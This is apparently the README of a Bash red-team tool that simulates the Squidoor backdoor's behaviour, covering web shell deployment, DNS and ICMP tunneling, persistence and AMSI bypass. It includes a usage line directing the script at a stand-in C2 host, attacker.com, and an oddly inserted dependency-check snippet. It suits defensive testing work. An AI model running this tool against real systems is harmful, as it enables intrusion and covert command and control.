A comprehensive Bash script that simulates advanced adversary behaviors inspired by the Squidoor backdoor, as documented by Unit 42. This tool is designed for penetration testing, red teaming, and validating cyber defense mechanisms.
Features:
Initial Access:
- IIS vulnerability exploitation
- Web shell deployment (ASPX)
- Multiple persistence mechanisms
Command and Control:
- Outlook API communication
- DNS tunneling
- ICMP tunneling
- Encrypted communication channels
Persistence Mechanisms:
- Registry modifications
- Scheduled tasks
- WMI event subscriptions
Evasion Techniques:
- AMSI bypass
- Payload obfuscation
- Encrypted communication
Requirements:
- Bash 5.0 or higher
- Root privileges (recommended)
- Required tools:
  - dnscat2
  - icmpsh
  - impacket
  - metasploit-framework
  - yq
Installation:
- Clone the repository:
  git clone https://github.com/yourusername/squidoor-simulator.git
  cd squidoor-simulator
- Make the script executable:
  chmod +x squidoor_simulator.sh
- Install dependencies (the script checks for missing dependencies automatically and prompts to install them):
  ./squidoor_simulator.sh -h
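The pre-flight check described above, written out as an added example (not the simulator's own code) against the requirements listed in this README: Bash 5.0 or higher, root privileges, and the five required tools. It assumes each tool is discoverable as a command on PATH; the actual command names installed for packages such as impacket or metasploit-framework may differ, so adjust REQUIRED_TOOLS to your system.

```shell
#!/usr/bin/env sh
# Added example, not the project's own code: pre-flight check modelled on the
# README's requirement list. Assumption: tools are looked up as PATH commands.

REQUIRED_TOOLS="dnscat2 icmpsh impacket metasploit-framework yq"

# bash_major_ok VERSION : succeed when the major component of VERSION is >= 5
bash_major_ok() {
    major=${1%%.*}
    [ "$major" -ge 5 ] 2>/dev/null
}

# installed_bash_version : print the version of the bash binary on PATH, or 0
installed_bash_version() {
    if command -v bash >/dev/null 2>&1; then
        bash -c 'printf "%s\n" "$BASH_VERSION"'
    else
        echo 0
    fi
}

# missing_tools NAME... : print each NAME not found on PATH; return 1 if any
missing_tools() {
    rc=0
    for tool in "$@"; do
        if ! command -v "$tool" >/dev/null 2>&1; then
            echo "$tool"
            rc=1
        fi
    done
    return "$rc"
}

# preflight : run every check, report problems on stderr, succeed only if all pass
preflight() {
    rc=0
    ver=$(installed_bash_version)
    bash_major_ok "$ver" || { echo "bash 5.0+ required, found: $ver" >&2; rc=1; }
    [ "$(id -u)" -eq 0 ] || echo "warning: not running as root (recommended)" >&2
    # shellcheck disable=SC2086
    missing=$(missing_tools $REQUIRED_TOOLS) || {
        printf 'missing tools:\n%s\n' "$missing" >&2
        rc=1
    }
    return "$rc"
}

preflight && echo "all prerequisites satisfied"
```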
Basic usage:
./squidoor_simulator.sh -t <target> -c <c2-server> -p <protocol>
Options:
-t, --target: Target IP address or hostname
-c, --c2-server: Command and Control server address
-p, --protocol: C2 protocol (outlook|dns|icmp)
-h, --help: Show help message
Example:
./squidoor_simulator.sh -t 192.168.1.100 -c attacker.com -p outlook
The script uses a YAML configuration file (config.yaml) for detailed settings. A default configuration will be created if none exists.
Configuration options include:
- Target settings
- C2 server details
- Web shell configuration
- Persistence mechanisms
- Evasion techniques
The script generates:
- Detailed logs in squidoor.log
- A simulation report in squidoor_report_[timestamp].txt
- Temporary files in /tmp/squidoor/
This tool is for educational and testing purposes only. Use only on systems you own or have explicit permission to test. Unauthorized use may be illegal.
License: MIT License - See LICENSE file for details
Acknowledgments:
- Unit 42 for their analysis of the Squidoor backdoor
- The security research community for their contributions to understanding advanced adversary behaviors